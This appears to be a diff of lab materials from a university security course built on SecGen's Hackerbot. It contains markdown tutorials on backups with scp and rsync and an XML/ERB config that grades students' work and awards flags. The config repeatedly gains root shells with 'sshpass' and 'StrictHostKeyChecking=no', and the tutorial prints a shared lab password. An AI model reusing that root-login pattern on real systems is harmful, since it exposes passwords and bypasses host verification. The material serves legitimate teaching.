<link rel="stylesheet" href="css/github-markdown.css">
<style>
.markdown-body {
box-sizing: border-box;
min-width: 200px;
max-width: 980px;
margin: 0 auto;
padding: 45px;
}
@media (max-width: 767px) {
.markdown-body {
padding: 15px;
}
}
</style>
<article class="markdown-body">
<%= self.html_rendered %>
</article>
<script src="js/code-prettify/loader/run_prettify.js"></script>
</body>
</html>

View File

@@ -0,0 +1,4 @@
## License
This lab by [*Z. Cliffe Schreuders*](http://z.cliffe.schreuders.org) at Leeds Beckett University is licensed under a [*Creative Commons Attribution-ShareAlike 3.0 Unported License*](http://creativecommons.org/licenses/by-sa/3.0/deed.en_GB).
Included software source code is also licensed under the GNU General Public License, either version 3 of the License, or (at your option) any later version.

View File

@@ -0,0 +1,338 @@
# Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync
## Getting started
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot_server (leave it running, you don't log into this)
- backup_server (IP address: <%= $server_ip %>)
- desktop
All of these VMs need to be running to complete the lab.
### Your login details for the "desktop" and "backup_server" VMs
User: <%= $main_user %>
Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
You won't login to the hackerbot_server, but the VM needs to be running to complete the lab.
You don't need to login to the backup_server, but you will connect to it via SSH later in the lab.
### For marks in the module
1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to other's in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
## Meet Hackerbot!
![small-right](images/skullandusb.svg)
This exercise involves interacting with Hackerbot, a chatbot who will attack your system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
**On the desktop VM:**
==Open Pidgin and send "hello" to Hackerbot:==
Work through the below exercises, completing the Hackerbot challenges as noted.
---
## Availability and recovery
As you will recall, availability is a common security goal. This includes data availability, and systems and services availability. Preparing for when things go wrong, and having procedures in place to respond and recover is a task known as contingency planning. This includes business continuity planning (BCP), which has a wide scope covering many kinds of problems, disaster recovery planning, which aims to recover ICT after a major disaster, and incident response (IR) planning, which aims to detect and respond to security incidents.
Business impact analysis involves determining which business processes are mission critical, and what the recovery requirements are. This includes Recovery Point Objectives (RPO), that is, which data and services are acceptable to lose and how often backups are necessary, and Recovery Time Objectives (RTO), which is how long it should take to recover, and the amount of downtime that is allowed for.
Having reliable backups and redundancy that can be used to recover data and/or services is a basic security maintenance requirement.
## Uptime
At a console, ==run:==
```bash
uptime
```
``
15:32:38 up 4 days, 23:50, 4 users, load average: 1.01, 1.24, 1.17
``
A common goal is to aim for "five nines" availability (99.999%). If you only have one server, that means keeping it running constantly, other than for scheduled maintenance.
==In your log book, list a few legitimate security reasons for performing off-line maintenance.==
## Copy
The simplest of Unix copy commands, is "cp". Cp takes a local source and destination, and can recursively copy contents from one file or directory to another.
Make a directory to store your backups. ==Run:==
```bash
mkdir /home/<%= $main_user %>/backups/
```
==Make a backup copy of your /etc/passwd file:==
```bash
cp /etc/passwd /home/<%= $main_user %>/backups/
```
We have made a backup of a source file (/etc/passwd), to our destination directory (/home/<%= $main_user %>/backups/). Note that we lost the metadata associated with the file, including file ownership and permissions:
```bash
ls -la /home/<%= $main_user %>/backups/passwd
ls -la /etc/passwd
```
Note (and take the time to understand) the differences in the output from these two commands.
## SSH (secure shell) and SCP (secure copy)
Using SSH (secure shell), scp (secure copy) can transfer files securely (encrypted) over a network.
> This replaces the old insecure rcp command, which sends files over the network in-the-clear (not encrypted). Rcp should never be used.
==Backup your /etc/ directory to the backup_server== computer using scp:
```bash
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh\_backup/
```
> This may take some time, feel free to open another terminal console (Ctrl-T), to read the scp man page
Read the scp man page to ==determine what the -p and -r flags do==.
> Hint: "man scp", press "q" to quit.
Now, lets add a file to /etc, and repeat the backup:
```bash
sudo bash -c 'echo > /etc/hi'
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh\_backup/
```
Note that the program re-copies all of the files entirely, regardless of whether (or how much) they have changed.
==Ssh to your backup_server system==, to look at your backup files:
> ssh ***username***@***server-ip-address***
This will log you in with *username* on their system. Assuming their computer has the same user account available (as is the case with the VMs provided), you can omit "username", and just run "ssh *ip-address*", and you will be prompted to provide authentication for your own account, as configured on their system.
So, that is:
```bash
ssh <%= $server_ip %>
```
> Enter your password when prompted
List the files that have been backed up:
```bash
ls -la ssh_backup/
```
**Exit ssh**:
> exit
>
> (Or Ctrl-D)
>
> Note, this command will close your bash shell, if you are not logged in via ssh.
## Rsync, deltas and epoch backups
Rsync is a popular tool for copying files locally, or over a network. Rsync can use delta encoding (only sending *differences* over the network rather than whole files) to reduce the amount of data that needs to be transferred. Many commercial backup systems provide a managed frontend for rsync.
Note: make sure you exited ssh above, and are now running commands on your local system.
Lets start by doing a simple ==copy of your /etc/ directory== to a local copy:
```bash
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
> Note that the presence of a trailing "/" changes the behaviour, so be careful when constructing rsync commands. In this case we are copying the directory (not just its contents), into the directory etc\_backup. See the man page for more information.
Rsync reports the amount of data "sent".
Read the rsync man page, to ==understand the flags we have used== (-a and -v). As you will see, Rsync has a great deal of options.
Now, lets ==add a file to /etc, and repeat the backup:==
```bash
sudo bash -c 'echo hello > /etc/hello'
sudo rsync -av /etc /home/<%= $main_user %>/backups/rsync_backup/
```
Note that only the new file was transferred (incremental) to update our epoch (full) backup of /etc/.
## Rsync remote copies via SSH with compression
Rsync can act as a server, listening on a TCP port. It can also be used via SSH, as you will see. ==Copy your /etc/ directory to your backup_server== system using Rsync via SSH:
```bash
sudo rsync -avzh /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
> Tip: this is all one line
Note that this initial copy will have used less network traffic compared to scp, due to the -z flag, which tells rsync to use compression. Compare the amount of data sent (as reported by rsync in the previous command -- the -h told rsync to use human readable sizes) to the size of the date that was sent:
```bash
sudo du -sh /etc
```
Now, if you were to ==delete a local file== that had been backed up:
```bash
sudo rm /etc/hello
```
Even if you ==re-sync your local changes== to the server (your classmates system), the file will not be deleted from the server:
```bash
sudo rsync -avzh /etc <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-backup/
```
To recover the file, you can simply ==retrieve the backup:==
```bash
sudo rsync -avz <%= $main_user %>@<%= $server_ip %>:/home/username/remote-rsync-backup/etc/hello /etc/
```
> Note, however, that the new file is now no longer owned by root. This can be avoided, if you have SSH root access to the remote machine (for security reasons this is not usually done) to retain ownership and so on. Alternatively, you can use an Rsync server running as root.
==Delete the file locally, and sync the changes== *including deletions* to the server so that it is also deleted there:
```bash
sudo rm /etc/hello
sudo rsync -avz --delete /etc *username*@*their-ip-address*:/home/*username*/my-rsync-backup/
```
> Note the added "**-\-delete**"
==Confirm that the file has been deleted== from the backup stored on the server.
> Hint: login via SSH and view the backups
==Compare the file access/modification times== of the scp and rsync backups, are they the same/similar? If not, why? Note that rsync can retain this information, if run as root.
## Rsync incremental/differential backups
If you need to keep daily backups, it would be an inefficient use of disk space (and network traffic and/or disk usage) to simply save separate full copies of your entire backup each day. Therefore, it often makes sense to copy only the files that have changed for our daily backup. This can either be comparisons to the last backup (incremental), or last full backup (differential).
### Differential backups
==Create a full backup== of /etc/ to your local /tmp/ directory.
==Create a new file== in /etc:
```bash
sudo bash -c 'echo "hello there" > /etc/hello'
```
And now lets ==create a differential backup== of our changes to /etc:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ /tmp/etc_backup2/
```
> The **-\-compare-dest** flag tells rsync to search these backup copies, and only copy files if they have changed since a backup. Refer the the man page for further explanation.
Look at what is contained in /tmp/etc\_backup2/:
```bash
tree /tmp/etc_backup2
ls -la /tmp/etc_backup2/
```
Note that there are lots of empty directories, with only the files that have actually changed (in this case /etc/hello).
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "hello there!" > /etc/hi'
```
To ==make a differential backup== (saving changes since the last full backup), we just repeat the previous command, with a new destination directory:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ /tmp/etc_backup3/
```
Look at the contents of your new backup. You will find it now contains your two new files. That is, all of the changes since the full backup.
==Delete a non-essential existing file== in /etc/, and our test hello file:
```bash
sudo rm /etc/wgetrc /etc/hello
```
Now ==restore from your backups== by first restoring from the full backup, then the latest differential backup. The advantage to a differential backup, is you only need to use two commands to restore your system.
### Incremental backups
The disadvantage of the above differential approach to backups, is that your daily backup gets bigger and bigger every day until you do another full backup. With incremental backups you only store the changes since the last backup.
Now ==create another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test1'
```
Now ==create an incremental backup== based on the last differential backup:
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ --compare-dest=/tmp/etc_backup3/ /tmp/etc_backup_incremental1/
```
==Another change== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test2'
```
Now ==create an incremental backup based on the last differential backup and the last incremental backup:==
```bash
sudo rsync -av /etc --compare-dest=/tmp/etc_backup/ --compare-dest=/tmp/etc_backup3/ --compare-dest=/tmp/etc_backup_incremental1/ /tmp/etc_backup_incremental2/
```
If we were to ==delete a number of files:==
```bash
sudo rm /etc/wgetrc /etc/hello /etc/test1 /etc/test2
```
Now ==restore /etc== by restoring from the full backup, then the last differential backup, then the first incremental backup, then the second incremental backup.
### Rsync snapshot backups
Another approach to keeping backups is to keep a snapshot of all of the files, but wherever the files have not changed, a hard link is used to point at a previously backed up copy. If you are unfamiliar with hard links, read more about them online. This approach gives users a snapshot of how the system was on a particular date, without having to have redundant full copies of files.
These snapshots can be achieved using the --link-dest flag. Open the Rsync man page, and read about --link-dest. Lets see it in action.
==Make another copy of our local /etc backup:==
```bash
sudo rsync -avh --delete /etc /tmp/etc_snapshot_full
```
And ==make a snapshot== containing hard links to files that have not changed, with copies for files that have changed:
```bash
sudo rsync -avh --delete --link-dest=/tmp/etc_snapshot_full /etc /tmp/etc_snapshot1
```
Rsync reports not having copied any new files, yet look at what is contained in /tmp/etc\_snapshot1. It looks like a complete copy, yet is taking up almost no extra storage space.
==Create other changes== to /etc:
```bash
sudo bash -c 'echo "Another test change" > /etc/test3'
sudo bash -c 'echo "Another test change" > /etc/test4'
```
And ==make a new snapshot==, with copies of files that have changed:
```bash
sudo rsync -avh --delete --link-dest=/tmp/etc_snapshot_full /etc /tmp/etc_snapshot2
```
==Delete some files==, and ==make a new differential snapshot==. Although Rsync does not report a deletion, the deleted files will be absent from the new snapshot.
==Recover a file from a previous snapshot.==
## Resources
[http://webgnuru.com/linux/rsync\_incremental.php](http://webgnuru.com/linux/rsync_incremental.php)
[http://everythinglinux.org/rsync/](http://everythinglinux.org/rsync/)

View File

@@ -0,0 +1,86 @@
## Uptime
At a console, ==run:==
```bash
uptime
```
`15:32:38 up 4 days, 23:50, 4 users, load average: 1.01, 1.24, 1.17`
A common goal is to aim for "five nines" availability (99.999%). If you only have one server, that means keeping it running constantly, other than for scheduled maintenance.
==In your log book, list a few legitimate security reasons for performing off-line maintenance.==
## Copy
The simplest of Unix copy commands, is `cp`. `cp` takes a local source and destination, and can recursively copy contents from one file or directory to another.
Make a directory to store your backups. ==Run:==
```bash
mkdir /home/<%= $main_user %>/backups/
```
==Make a backup copy of your /etc/passwd file:==
```bash
cp /etc/passwd /home/<%= $main_user %>/backups/
```
We have made a backup of a source file (/etc/passwd), to our destination directory (/home/<%= $main_user %>/backups/). Note that we lost the metadata associated with the file, including file ownership and permissions:
```bash
ls -la /home/<%= $main_user %>/backups/passwd
ls -la /etc/passwd
```
Note and take the time to ==understand the differences in the output== from these two commands. Notably the backup file is now owned by <%= $main_user %> (and also belongs to that user's primary group).
## SSH (secure shell) and SCP (secure copy)
Using SSH (secure shell), `scp` (secure copy) can transfer files securely (encrypted) over a network.
> This replaces the old insecure rcp command, which sends files over the network in-the-clear (not encrypted). Rcp should never be used.
==Backup your /etc/ directory to the backup_server== computer using `scp`:
```bash
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
> You will be prompted for your local password, to confirm the hosts fingerprint ("yes"), and the remote password (which is the same).
> This copy may take some time, feel free to open another terminal console (Ctrl-T), to read the scp man page while you wait.
Read the scp man page to ==determine what the `-p` and `-r` flags do==.
> Hint: "`man scp`", press "q" to quit.
Now, lets add a file to /etc, and repeat the backup:
```bash
sudo bash -c 'echo > /etc/hi'
sudo scp -pr /etc/ <%= $main_user %>@<%= $server_ip %>:/home/<%= $main_user %>/ssh_backup/
```
Note that the program re-copies all of the files entirely, regardless of whether (or how much) they have changed.
==SSH to your backup_server system==, to look at your backup files:
> `ssh *username*@*server-ip-address*` will log you in with *username* on the system. Assuming the remote computer has the same user account available (as is the case with the VMs provided), you can omit "username", and just run "`ssh *ip-address*`", and you will be prompted to provide authentication for your own account, as configured on their system.
So, that is:
```bash
ssh <%= $server_ip %>
```
> Enter your password when prompted
List the files that have been backed up:
```bash
ls -la ssh_backup/
```
**Exit ssh**:
> `exit`
>
> (Or Ctrl-D)
>
> Note, this command will close your bash shell, if you are not logged in via ssh.

View File

@@ -0,0 +1,44 @@
# Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync
## Getting started
### VMs in this lab
==Start these VMs== (if you haven't already):
- hackerbot_server (leave it running, you don't log into this)
- backup_server (IP address: <%= $server_ip %>)
- desktop
All of these VMs need to be running to complete the lab.
### Your login details for the "desktop" and "backup_server" VMs
User: <%= $main_user %>
Password: tiaspbiqe2r (**t**his **i**s **a** **s**ecure **p**assword **b**ut **i**s **q**uite **e**asy **2** **r**emember)
You won't login to the hackerbot_server, but the VM needs to be running to complete the lab.
You don't need to login to the backup_server, but you will connect to it via SSH later in the lab.
### For marks in the module
1. **You need to submit flags**. Note that the flags and the challenges in your VMs are different to other's in the class. Flags will be revealed to you as you complete challenges throughout the module. Flags look like this: ==flag{*somethingrandom*}==. Follow the link on the module page to submit your flags.
2. **You need to document the work and your solutions in a workbook**. This needs to include screenshots (including the flags) of how you solved each Hackerbot challenge and a writeup describing your solution to each challenge, and answering any "Workbook Questions". The workbook will be submitted later in the semester.
## Hackerbot!
![small-right](images/skullandusb.svg)
This exercise involves interacting with Hackerbot, a chatbot who will task you to perform backups and will attack your system. If you satisfy Hackerbot by completing the challenges, she will reveal flags to you.
**On the desktop VM:**
==Open Pidgin and send "hello" to Hackerbot:==
Work through the below exercises, completing the Hackerbot challenges as noted.
---
## Availability and recovery
As you will recall, availability is a common security goal. This includes data availability, and systems and services availability. Preparing for when things go wrong, and having procedures in place to respond and recover is a task known as contingency planning. This includes business continuity planning (BCP), which has a wide scope covering many kinds of problems, disaster recovery planning, which aims to recover ICT after a major disaster, and incident response (IR) planning, which aims to detect and respond to security incidents.
Business impact analysis involves determining which business processes are mission critical, and what the recovery requirements are. This includes Recovery Point Objectives (RPO), that is, which data and services are acceptable to lose and how often backups are necessary, and Recovery Time Objectives (RTO), which is how long it should take to recover, and the amount of downtime that is allowed for.
Having reliable backups and redundancy that can be used to recover data and/or services is a basic security maintenance requirement.

View File

@@ -0,0 +1,440 @@
<%
require 'json'
require 'securerandom'
require 'digest/sha1'
require 'fileutils'
require 'erb'
if self.accounts.empty?
abort('Sorry, you need to provide an account')
end
$first_account = JSON.parse(self.accounts.first)
$second_account = JSON.parse(self.accounts[1])
$files = []
$log_files = []
if $second_account.key?("leaked_filenames") && $second_account['leaked_filenames'].size > 0
$files = $second_account['leaked_filenames']
$log_files = $second_account['leaked_filenames'].grep(/log/)
end
if $files.empty?
$files = ['myfile', 'afile', 'filee', 'thefile']
end
if $log_files.empty?
$log_files = ['log', 'thelog', 'logs', 'frogonalog']
end
$main_user = $first_account['username'].to_s
$second_user = $second_account['username'].to_s
$example_file = "/home/#{$second_user}/#{$files.sample}"
$example_dir = "/home/#{$second_user}/personal_secrets/"
$server_ip = self.server_ip.first
$root_password = self.root_password
$flags = self.flags
REQUIRED_FLAGS = 10
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
end
def get_binding
binding
end
%>
<?xml version="1.0"?>
<hackerbot
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/hackerbot">
<!--<hackerbot xmlns="http://www.github/cliffe/SecGen/hackerbotz"-->
<name>Hackerbot</name>
<AIML_chatbot_rules>config/AIML</AIML_chatbot_rules>
<!--Method for gaining shell access, can be overwritten per-attack-->
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Hey, today I'm your boss of sorts... Work with me and I'll pay you in flags :) These tasks do require the steps to be completed in order.</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
<say_ready>'Ready'?</say_ready>
<next>Ok, I'll do what I can to move things along...</next>
<next>Moving things along to the next one...</next>
<previous>Ok, I'll do what I can to back things up...</previous>
<previous>Ok, backing up.</previous>
<goto>Ok, skipping it along.</goto>
<goto>Let me see what I can do to goto that job.</goto>
<last_attack>That was the last one for now. You can rest easy, until next time... (End.)</last_attack>
<last_attack>That was the last one. Game over?</last_attack>
<first_attack>You are back to the beginning!</first_attack>
<first_attack>This is where it all began.</first_attack>
<getting_shell>Ok. Gaining shell access, and running post command...</getting_shell>
<getting_shell>Here we go...</getting_shell>
<got_shell>I am in to your system.</got_shell>
<got_shell>I have shell.</got_shell>
<repeat>Let me know when you are 'ready', if you want to move on say 'next', or 'previous' and I'll move things along.</repeat>
<repeat>Say 'ready', 'next', or 'previous'.</repeat>
<!--Single responses:-->
<help>I am waiting for you to say 'ready', 'next', 'previous', 'list', 'goto *X*', or 'answer *X*'</help>
<say_answer>Say "The answer is *X*".</say_answer>
<no_quiz>There is no question to answer</no_quiz>
<correct_answer>Correct</correct_answer>
<incorrect_answer>Incorrect</incorrect_answer>
<invalid>That's not possible.</invalid>
<non_answer>Wouldn't you like to know.</non_answer>
<!--can be overwritten per-attack-->
<shell_fail_message>Oh no. Failed to get shell... You need to let us in.</shell_fail_message>
</messages>
<tutorial_info>
<title>Backing Up and Recovering from Disaster: SSH/SCP, Deltas, and Rsync</title>
<tutorial><%= ERB.new(File.read self.templates_path + 'intro.md.erb').result(self.get_binding) %></tutorial>
<footer>
<%= File.read self.templates_path + 'resources.md.erb' %>
<%= File.read self.templates_path + 'license.md.erb' %>
Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%= Time.new.to_s %>)
</footer>
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<attack>
<% $file = SecureRandom.hex(2) -%>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<prompt>Use scp to copy the desktop /bin/ directory to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-bin-backup-<%= $file %>/, which should then include the backed up bin/ directory.</prompt>
<post_command>ls /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/ls /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/mkdir > /dev/null; echo $?</post_command>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to the remote /home/<%= $main_user %>/remote-bin-backup-<%= $file %>/bin/... Remember that the trailing / changes whether you are copying directories or their contents...</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'cp_ssh.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync-->
<prompt>It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.</prompt>
<post_command>ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to remote ssh /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...</message>
</condition>
<else_condition>
<message>:( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'rsync.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<% $first_notes = SecureRandom.hex(2) -%>
<% $hidden_flag = $flags.pop -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>The <%= $second_user %> user is about to create some files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Note to self: drink more water <%= $first_notes %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep" > /home/<%= $second_user %>/logs/log2; echo <%= $hidden_flag %> > /home/<%= $second_user %>/personal_secrets/flag; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... (Hint: Keep an eye out for a flag...)</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<!--TODO: needs testing: fixed $files.sample?-->
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync differential-->
<prompt>Create a differential backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-differential1/.</prompt>
<!--grep retval=0 when match is found, 1/2 otherwise-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-differential1/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-differential1/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; echo $status1$status2</post_command>
<condition>
<output_matches>0[1-9]</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>00</output_matches>
<message>:( You backed up to the correct location, but it wasn't an differential backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<% $rand_diff2 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync differential-->
<prompt>The <%= $second_user %> user is about to create some more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Dont forget the milk" >> /home/<%= $second_user %>/notes; echo "Beep boop beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand_diff2 %> > /home/<%= $second_user %>/personal_secrets/really_not_a_flag; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync differential-->
<prompt>Create another differential backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-differential2/.</prompt>
<!--check for the first set of changes (status1), the original files (shouldn't be there)(status2), then the new files(status3)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-differential2/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; echo $status1$status2$status3</post_command>
<condition>
<output_matches>0[1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>[1-9][1-9]0</output_matches>
<message>:( Your differential backup should also include the first set of changes (all changes since the full backup).</message>
</condition>
<condition>
<output_matches>000</output_matches>
<message>:( You backed up to the correct location, but it wasn't a differential backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include all the changes since the full backup (including the first set of changes), but not the original files.</message>
</else_condition>
</attack>
<attack>
<% $rand2 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>The <%= $second_user %> user is about to create even more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Buy eggs <%= $rand2 %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand2 %> > /home/<%= $second_user %>/personal_secrets/<%= $rand2 %>; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync incremental-->
<prompt>Create an incremental backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-incremental1/. Base it on the epoch and also differential2.</prompt>
<!--check for the first set of changes (shouldn't be there)(status1), the original files (shouldn't be there)(status2), then files1(shouldn't be there)(status3), then the new files(should be there)(status4)-->
<post_command>grep '<%= $hidden_flag %>' /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/flag > /dev/null; status1=$?; ls /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/<%= $files.sample %> > /dev/null; status2=$?; grep <%= $rand_diff2 %> /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/really_not_a_flag > /dev/null; status3=$?; grep <%= $rand2 %> /home/<%= $main_user %>/remote-rsync-incremental1/<%= $second_user %>/personal_secrets/<%= $rand2 %> > /dev/null; status4=$?; echo $status1$status2$status3$status4</post_command>
<condition>
<output_matches>[1-9][1-9][1-9]0</output_matches>
<message>:) Well done! <%= $flags.pop %> </message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<condition>
<output_matches>[1-9][1-9][1-9][1-9]</output_matches>
<message>:( You didn't backup to the specified remote directory.</message>
</condition>
<condition>
<output_matches>0[1-9]?{2}</output_matches>
<message>:( You backed up to the correct location, but it wasn't an incremental backup... You probably need to ssh in and delete that last backup and try again.</message>
</condition>
<else_condition>
<message>:( Something went wrong... Your backup should include just the changes since the last backup.</message>
</else_condition>
</attack>
<attack>
<% $rand3 = SecureRandom.hex(2) -%>
<!--shell on the desktop-->
<!-- topic: Rsync-->
<prompt>Again, the <%= $second_user %> user is about to create even more files...</prompt>
<post_command>sudo -u <%= $second_user %> bash -c 'echo "Buy batteries <%= $rand3 %>" > /home/<%= $second_user %>/notes; echo "Beep boop beep beep" >> /home/<%= $second_user %>/logs/log2; echo <%= $rand3 %> > /home/<%= $second_user %>/personal_secrets/nothing_much; echo $?'</post_command>
<condition>
<output_matches>Permission denied|Operation not permitted|Read-only</output_matches>
<message>:( Oh no. Access errors. <%= $second_user %> failed to write the files... The user needs to be able to write to their files!</message>
</condition>
<condition>
<output_matches>0</output_matches>
<message>Ok, good... No flag this time, carry on...</message>
<trigger_next_attack>true</trigger_next_attack>
</condition>
<else_condition>
<message>:( Something went wrong...</message>
</else_condition>
</attack>
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $server_ip %> /bin/bash</get_shell>
<!-- topic: Rsync incremental-->
<prompt>Create another incremental backup of <%= $second_user %>'s desktop files to the backup_server: <%= $server_ip %>:/home/<%= $main_user %>/remote-rsync-incremental2/.</prompt>
